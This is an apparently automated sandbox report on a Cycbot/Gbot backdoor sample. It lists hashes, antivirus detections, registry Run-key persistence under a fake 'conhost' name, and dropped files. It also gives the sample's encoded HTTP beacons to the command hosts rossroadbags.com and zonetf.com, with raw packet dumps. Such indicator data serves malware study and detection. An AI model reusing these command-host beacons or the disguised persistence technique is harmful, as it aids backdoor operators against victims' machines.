Analysis Date2015-01-17 13:28:35
MD52e3e8aae0c4d4a435040e8d743a033f2
SHA161d450c1ee678794030d2217a1d257d412d2c2a8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 65dbc2a74e105a129f2e501d8da3028c sha1: 84a9809b40838da056c44c82eeca2353a464cc47 size: 150528
Section.rdata md5: 7f026155ac81300f01e5f231c51191e0 sha1: 4a378ee3379d2999fe4b4e913775528ab7ad718a size: 1024
Section.data md5: a79e048f24cc2bc407efa20aed0e0461 sha1: bae22dfef6975af5ea8cebe25ce192b57c2ce5a8 size: 19968
Section.crt md5: a16803c07003f766135fef0065bbef43 sha1: bc57c96bbb88bee4fbed850cda1465705be19f88 size: 512
Timestamp2005-09-10 00:28:51
VersionPrivateBuild: 1051
PEhashd05012c2f2a237b108e2f2560f7df483c3113e61
IMPhash47d147a0f1cbb5bd87c6ee399ff75a38
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Agent.psa.41
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-59855
AVDr. WebBackDoor.Gbot.15
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KAP
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Agent.DQLH
AVGrisoft (avg)Cryptic.CBZ
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyHoax.Win32.ArchSMS.gen
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingTrojan.Win32.Generic.12787FE1
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Trojan.Diple

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSonloneservermonitoring.com
Winsock DNSofflineservermonitoring.com
Winsock DNS127.0.0.1
Winsock DNSrossroadbags.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSrossroadbags.com
Type: A
50.56.218.189
DNSzonetf.com
Type: A
141.8.225.80
DNSonloneservermonitoring.com
Type: A
DNSofflineservermonitoring.com
Type: A
HTTP GEThttp://rossroadbags.com/images/p_thumb/3521.jpg?tq=gP4aKydlxIAUQjLd11JEgWF2a0B6hr%2BkFV3LSkv%2BvuszGHEAlVXOlgdKJpido9OfPJqHhwgnAbCWxROt6Hx2P5Jhu5v5IH1XhjsV5fqGs4KkXmzK8yekoISjTNy1Hy60EKGdkZUF7tKHBx7Bz%2FmA22%2F4%2BMy5ummeAm%2BIoFmK0hMm3Ys5mVRyCqZI3f4tFK%2F9dgf8OLo%2Fg9XpADQZedoiUNm8IuL5THP6jguidUjLHo04mbuLj%2Fy40Hw64gzFiFe7ZN1ifIfWxLp7vIP29i3dp%2F%2FrOe454rypIQ7laPiImNBakx6C0uA38dZ4TPj9ehVt4RIRYP2JtYB9N%2F3XPMUw1KIHPc75cQPtx3lQfziBQRzNyZOdXk7ucuUCJsJV5gmT7qZI3hvYViewaoI8Vd%2Bb5wDQLoT6%2F4kGdTsjqBj2FzKPPUscOgkdU5fYb4jO0BRth
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 50.56.218.189:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 705f7468   GET /images/p_th
0x00000010 (00016)   756d622f 33353231 2e6a7067 3f74713d   umb/3521.jpg?tq=
0x00000020 (00032)   67503461 4b79646c 78494155 516a4c64   gP4aKydlxIAUQjLd
0x00000030 (00048)   31314a45 67574632 61304236 68722532   11JEgWF2a0B6hr%2
0x00000040 (00064)   426b4656 334c536b 76253242 7675737a   BkFV3LSkv%2Bvusz
0x00000050 (00080)   47484541 6c56584f 6c67644b 4a706964   GHEAlVXOlgdKJpid
0x00000060 (00096)   6f394f66 504a7148 6877676e 41624357   o9OfPJqHhwgnAbCW
0x00000070 (00112)   78524f74 36487832 50354a68 75357635   xROt6Hx2P5Jhu5v5
0x00000080 (00128)   49483158 686a7356 35667147 73344b6b   IH1XhjsV5fqGs4Kk
0x00000090 (00144)   586d7a4b 3879656b 6f49536a 544e7931   XmzK8yekoISjTNy1
0x000000a0 (00160)   48793630 454b4764 6b5a5546 37744b48   Hy60EKGdkZUF7tKH
0x000000b0 (00176)   42783742 7a253246 6d413232 25324634   Bx7Bz%2FmA22%2F4
0x000000c0 (00192)   2532424d 7935756d 6d65416d 25324249   %2BMy5ummeAm%2BI
0x000000d0 (00208)   6f466d4b 30684d6d 33597335 6d565279   oFmK0hMm3Ys5mVRy
0x000000e0 (00224)   43715a49 33663474 464b2532 46396467   CqZI3f4tFK%2F9dg
0x000000f0 (00240)   66384f4c 6f253246 67395870 4144515a   f8OLo%2Fg9XpADQZ
0x00000100 (00256)   65646f69 554e6d38 49754c35 54485036   edoiUNm8IuL5THP6
0x00000110 (00272)   6a677569 64556a4c 486f3034 6d62754c   jguidUjLHo04mbuL
0x00000120 (00288)   6a253246 79343048 77363467 7a466946   j%2Fy40Hw64gzFiF
0x00000130 (00304)   65375a4e 31696649 6657784c 70377649   e7ZN1ifIfWxLp7vI
0x00000140 (00320)   50323969 33647025 32462532 46724f65   P29i3dp%2F%2FrOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a724f65   on: close....rOe
0x00000150 (00336)   34353472 79704951 376c6150 69496d4e   454rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a72 79704951 376c6150 69496d4e   ...rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a72 79704951 376c6150 69496d4e   ...rypIQ7laPiImN
0x00000160 (00352)   42616b78 36433075 41333864 5a345450   Bakx6C0uA38dZ4TP
0x00000170 (00368)   6a396568 56743452 49525950 324a7459   j9ehVt4RIRYP2JtY
0x00000180 (00384)   42394e25 32463358 504d5577 314b4948   B9N%2F3XPMUw1KIH
0x00000190 (00400)   50633735 63515074 78336c51 667a6942   Pc75cQPtx3lQfziB
0x000001a0 (00416)   51527a4e 795a4f64 586b3775 63755543   QRzNyZOdXk7ucuUC
0x000001b0 (00432)   4a734a56 35676d54 37715a49 33687659   JsJV5gmT7qZI3hvY
0x000001c0 (00448)   56696577 616f4938 56642532 42623577   ViewaoI8Vd%2Bb5w
0x000001d0 (00464)   44514c6f 54362532 46346b47 6454736a   DQLoT6%2F4kGdTsj
0x000001e0 (00480)   71426a32 467a4b50 50557363 4f676b64   qBj2FzKPPUscOgkd
0x000001f0 (00496)   55356659 62346a4f 30425274 68204854   U5fYb4jO0BRth HT
0x00000200 (00512)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000210 (00528)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000220 (00544)   20726f73 73726f61 64626167 732e636f    rossroadbags.co
0x00000230 (00560)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000240 (00576)   55736572 2d416765 6e743a20 69616d78   User-Agent: iamx
0x00000250 (00592)   2f332e31 310d0a0d 0a                  /3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a6f5825 32425039 68253242 49307344   JoX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a75   OhLgjh8sG%2BcoJu
0x000000c0 (00192)   58253242 534e7a46 4b763937 35586c6d   X%2BSNzFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a3c 6872202f 3e0a2020   ose....<hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings

040904b0
1051
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
01Ir?`
(?>.\2
2\mgKL
3HRasAq
7,J0`b
;-9hX;op
9yO-o<b
ADVAPI32.dll
AlphaBlend
)a:y@We
~b";V7
CharLowerA
CharNextA
';cyT.
D[+":+
@.data
Dc5'uJ
E4eb9'
E(.hbS@
emY{J\
EnumResourceNamesW
ExitProcess
fe74%BE*
FreeLibrary
fwGK~Pp
)?*fz7Z1
GetClassLongA
GetKeyState
GetProcAddress
GetThreadPriority
)?!*&H>
h?6lm~
/H*M4JZm
&H?*uK)s
hV^>[#
`.hy4@
iljWP*0h|
I>?,)m
InterlockedDecrement
InterlockedIncrement
je.h%P@
J	?V7C
KERNEL32.dll
klL,<:
/Kn>KU
lk])J/
?LlZ]"
LoadLibraryA
LoadLibraryW
lvk4Op
lWu_hV.h"
M+5	(djD
Mk	}x^
MSIMG32.dll
:~My)B
NkH7Tc
%#NkqDW
ntwOoK
|o68;@
<oH(,UJ
oo=?a*
<Qay)Elz4
`.rdata
r%DU`;
RegCloseKey
RegCreateKeyExA
RegQueryValueExA
 RI9Zg
rpjg'cvl
}&(=t;:
!This program cannot be run in DOS mode.
ThlFre
Tj@.hX|@
Tm*I=T8
T\Q7Fe0
TransmitCommChar
TransparentBlt
TV.h,7@
ugRN7V5U
]uLY;/
;{U~nV
USER32.dll
V4jlu|:c
v.h/F@
@wktf;
W~TmtM
X>*/k 
x,LJ/W
xT4]M&
<(YVNK